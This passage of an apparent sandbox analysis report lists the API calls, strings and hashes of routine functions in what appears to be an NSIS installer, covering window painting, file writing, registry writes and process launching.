                                                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                          • wsprintfA.USER32 ref: 00406B4D
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                          • String ID: F$%s=%s$NUL$[Rename]
                                                                          • API String ID: 565278875-1653569448
                                                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F
                                                                          • API String ID: 941294808-1304234792
                                                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          Strings
                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                          • API String ID: 1641139501-220328614
                                                                          • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                          • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                          • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                                                          • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                          Strings
                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                          • String ID: created uninstaller: %d, "%s"
                                                                          • API String ID: 3294113728-3145124454
                                                                          • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                          • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                          • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                                                          • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                          Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                          • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                          • API String ID: 3734993849-2769509956
                                                                          • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                          • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                          • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                          • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                          Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                          • GetSysColor.USER32(00000000), ref: 00403E00
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                          • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                          • GetSysColor.USER32(?), ref: 00403E2B
                                                                          • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                          • DeleteObject.GDI32(?), ref: 00403E55
                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                          • String ID:
                                                                          • API String ID: 2320649405-0
                                                                          • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                          • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                          • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                          • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                          Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                          Strings
                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                          • API String ID: 1033533793-945480824
                                                                          • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                          • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                          • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                                                          • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                          Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2740478559-0
                                                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                            • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                          Strings
                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                          • Exec: command="%s", xrefs: 00402241
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                          • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                          • API String ID: 2014279497-3433828417
                                                                          • Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                          • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                          • Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
                                                                          • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                          Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                          • GetMessagePos.USER32 ref: 00404871
                                                                          • ScreenToClient.USER32(?,?), ref: 00404889
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Send$ClientScreen
                                                                          • String ID: f
                                                                          • API String ID: 41195575-1993550816
                                                                          • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                          • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                          • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                          • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                          Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                          • MulDiv.KERNEL32(0000F600,00000064,?), ref: 00403295
                                                                          • wsprintfW.USER32 ref: 004032A5
                                                                          • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                          Strings
                                                                          • verifying installer: %d%%, xrefs: 0040329F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                          • String ID: verifying installer: %d%%
                                                                          • API String ID: 1451636040-82062127
